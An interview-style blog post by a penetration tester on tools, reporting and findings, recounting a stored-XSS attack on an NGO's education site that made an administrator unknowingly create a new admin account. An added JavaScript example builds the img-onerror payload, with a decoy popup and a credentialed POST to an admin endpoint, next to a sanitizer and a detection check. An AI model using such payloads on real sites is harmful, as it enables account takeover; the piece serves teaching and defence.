
What tools can be a value-add for your security testing activity?
The famous tool that I use is “Brain” and its greatest “Capabilities”.
Note that I explore a lot of tools during the journey of penetration testing, as I come from a context-driven school of hackers.
A. Understanding the business (heuristics to learn)
- Talk to the key people
- Communicate with cross-functional teams
- Take a look at the specifications document
- Use the software, if it's available on the web, in order to learn
- Read about similar businesses
- Browse through the Exploit Database to see whether similar businesses had any kind of serious “hacking stories”, in order to learn from them and also to utilise the ideas in the project.
- Software tools like the “Passive Recon(naissance) add-on”, “Netcraft Site Report”, Maltego XL (if I have the licence), Whois, Nmap, fingerprinting tools, the Wayback Machine (to check how a particular web application evolved), Google Dorks (I love this).
B. Creation of the Report
- Videos for proof of concept (I use different screen-recording software depending on the operating system I am using; mostly malware-free / open-source software, based on my due diligence)
- Screenshots wherever applicable (for web: FireShot / Greenshot / or even the Print Screen feature 😊)
- Detailed description covering minute aspects of the vulnerabilities
- Add my contact details and availability (if required. Usually I am a night-crawler; however, I prefer to be available during the client’s time zone if they insist).
If you perform manual tests, please specify.
Well, I never understood what “manual” tests are. I have never heard of “manual programming” or anything like that. Everything comes from the brain and applying various thinking skills.
I use a tool-assisted exploratory approach to perform security / penetration tests, and sometimes it is without any tool assistance, but the brain itself can be a tool for me. For example: I can run the OWASP Top 10 using scanners, but they are merely instructions and cannot really come up with creative and intelligent attack vectors or payloads in order to discover the potential vulnerability.
So, my answer is:
I use mixed approaches which include Scanners ONLY + Brain-Assisted Tests for the OWASP Top 10 or any other kinds of attacks + Scanner- and Tool-Assisted Exploratory Testing.
What kinds of vulnerabilities have you found in websites? Please specify.
Starting from encryption-based vulnerabilities to SQL injection, authentication-based weaknesses / vulnerabilities, authorization, buggy SSL implementation, man-in-the-middle attacks, network interception, reverse engineering, cross-site request forgery, arbitrary unvalidated inputs, code injection, database hijacking, out of memory, DDoS (I wouldn’t really call this a vulnerability, though), finding sensitive data captured in the logs (log file analysis), HTTP request- and response-related vulnerabilities, and anywhere my brain could think of finding a loophole. They could also be a sequence of activities performed on the victim, target or software in order to achieve the hacking goals.
Have you ever tried to test whether a vulnerability you find in a website is really exploitable?
Yes, I always do that, with mental modelling and then by writing an exploit to demonstrate the severity of the discovered vulnerability.
I would love to share an experience of exploitation which I performed on a website. This was an education platform (a New York-based NGO) and it had a lot of features and various roles / authorisations.
Roles: Student, Teacher and Administrator
Authorisation Levels: Pretty good implementation
Identification: I found a cross-site scripting vulnerability in the image insert feature of the TinyMCE editor which was integrated within the application.
After identification: I started to think: what can I do with this vulnerability? How can I show the severity or damage potential of the XSS vulnerability that I have found? I started to use my feature-touring mind map to identify the features that connect me to different roles in the application. Well, I saw the “MESSAGING” feature in the application, where as a student you can send a message to the administrator or a teacher. The exploit I was thinking of goes this way: write malicious AJAX / JavaScript which will force the administrator to create a new administrator, delete all users, add more users, or perform any function that I wanted to execute from the student role.
AJAX snippet of code writing: here, I took the help of a team member who has programming skills in writing AJAX scripts. I shared my exploit idea and he helped me write this AJAX script in a few minutes (less than 15 minutes). It was capable of executing the XSS via the Messaging system / feature for the Administrator role and then creating a new administrator with the credentials given in the AJAX request embedded in the XSS exploit.
In short: “Log on as a Student” → “Create malicious AJAX XSS exploit” → “Send the exploit script to the Administrator through the TinyMCE editor / Messaging feature” → “Administrator opens the message and sees a popup box which says ‘Welcome to the Mail 2.0’” (this message is set so that the victim does not feel sceptical about the exploit) → and once the popup shows up, it means that our script has run or is running in stealth mode (nothing else is shown on the UI that would make the administrator feel doubtful or that something fishy is going on).
Result: I logged in with the credentials of the new admin created by the exploit and gained access to the full application; I can do anything now. In short, “I am the Supreme / Super Admin”.
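The chain described above, modelled as an added example in JavaScript (Node). This is not the interviewee's script and not code from the application he tested; the endpoint `/api/admin/users`, the JSON field names and the message markup are assumptions for illustration. It builds the kind of image-tag payload the editor's image insert would carry, shows a message renderer that echoes it unchanged next to one that runs it through an allow-list sanitizer, and includes the check a tester would run on the rendered page. One caveat worth keeping in the report: because the injected script executes inside the administrator's own session, any anti-CSRF token already present on the page is available to it, so CSRF protection alone does not break this chain; output encoding or sanitization of the stored message is what stops it.

```javascript
// Added example (not the interviewee's code): stored XSS via a rich-text image tag,
// chained into an admin-only action, plus the sanitizer that neutralises it.
// ASSUMPTIONS: the admin endpoint path, the JSON fields and the <div class="message"> markup.

// The attacker-controlled image tag a student could save through the editor. A bogus src
// plus an onerror handler executes the script in whoever renders the message. It runs with
// the victim's cookies (credentials:'include') and can read any CSRF token on the page.
function buildPayload(adminApi, username, password) {
  const js = [
    "alert('Welcome to the Mail 2.0');",                // decoy popup, as in the write-up
    `fetch('${adminApi}',{method:'POST',credentials:'include',`,
    "headers:{'Content-Type':'application/json'},",
    `body:JSON.stringify({username:'${username}',password:'${password}',role:'administrator'})});`,
  ].join('');
  return `<img src="x" onerror="${js}">`;
}

// Vulnerable message view: the stored rich-text body is concatenated into the page as-is.
function renderVulnerable(body) {
  return `<div class="message">${body}</div>`;
}

// Minimal allow-list sanitizer. Regex-based HTML sanitizers are easy to bypass (e.g. a '>'
// inside an attribute value confuses the tag regex below); in production use a vetted
// library such as DOMPurify or a server-side equivalent. Kept small so the idea is visible:
//  - drop <script>/<style> elements with their contents
//  - drop any tag not on the allow-list (HTML comments are left as inert text)
//  - on kept tags, drop every attribute except src/href/alt, and drop src/href values that
//    are not http(s) or site-relative, which removes javascript: and data: URLs
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br', 'a', 'img']);
const ALLOWED_ATTRS = new Set(['src', 'href', 'alt']);
const SAFE_URL = /^(https?:\/\/|\/(?!\/))/i;

function sanitize(body) {
  let out = body.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '');
  out = out.replace(/<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi, (whole, tag, attrs) => {
    const name = tag.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return '';
    if (whole.startsWith('</')) return `</${name}>`;
    const kept = [];
    const attrRe = /([a-z][a-z0-9-]*)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
    let m;
    while ((m = attrRe.exec(attrs)) !== null) {
      const attr = m[1].toLowerCase();
      const value = m[3] ?? m[4] ?? m[5];
      if (!ALLOWED_ATTRS.has(attr)) continue;              // kills on* handlers, style, etc.
      if ((attr === 'src' || attr === 'href') && !SAFE_URL.test(value.trim())) continue;
      kept.push(`${attr}="${value.replace(/"/g, '&quot;')}"`);
    }
    return `<${name}${kept.length ? ' ' + kept.join(' ') : ''}>`;
  });
  return out;
}

// Hardened message view: same markup, body sanitized before it reaches the page.
function renderHardened(body) {
  return `<div class="message">${sanitize(body)}</div>`;
}

// Tester's check on the rendered page: which inline event handlers survived?
function findEventHandlers(html) {
  const found = [];
  const re = /\son([a-z]+)\s*=/gi;
  let m;
  while ((m = re.exec(html)) !== null) found.push('on' + m[1].toLowerCase());
  return found;
}

// Stand-alone demonstration with constructed values.
const demoPayload = buildPayload('/api/admin/users', 'attacker', 'Passw0rd!');
console.log('vulnerable :', findEventHandlers(renderVulnerable(demoPayload)));  // ['onerror']
console.log('hardened   :', findEventHandlers(renderHardened(demoPayload)));    // []
```

Run it with `node` to see the handler survive the vulnerable renderer and disappear from the hardened one. The sanitizer is deliberately strict rather than clever: unknown tags and attributes are dropped outright instead of being "fixed", which is the property you want when the input comes from the lowest-privileged role and is displayed to the highest.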

About Author – Santhosh Tuppad
Santhosh Tuppad has played different roles in his life, which include being a passionate entrepreneur, liar, lover, boyfriend, thief, software tester, blogger, reader, trainer, coach, black-hat hacker, white-hat hacker, grey-hat hacker and what not. In this amazing journey of life, he has experienced his salvation. Not to forget that “Salvation comes at a price”, and of course he has paid that price. Before, he was known for being merciless, ruthless, unkind, evil etc. And today he is known for kindness and humbleness, and some people call him “Privacy Fighter”. Santhosh is also one of the OWASP Cheat Sheet contributors and shares his knowledge on Security and Testing unconditionally. The world finds his ways “Unconventional”, but he thinks that it’s the best 😉